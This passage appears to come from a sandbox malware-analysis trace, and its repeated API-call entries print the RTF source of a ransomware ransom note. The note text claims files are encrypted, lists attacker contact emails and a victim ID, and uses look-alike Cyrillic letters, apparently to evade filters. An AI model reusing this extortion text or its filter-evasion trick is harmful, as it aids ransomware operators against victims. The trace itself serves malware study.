s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.825] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.825] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 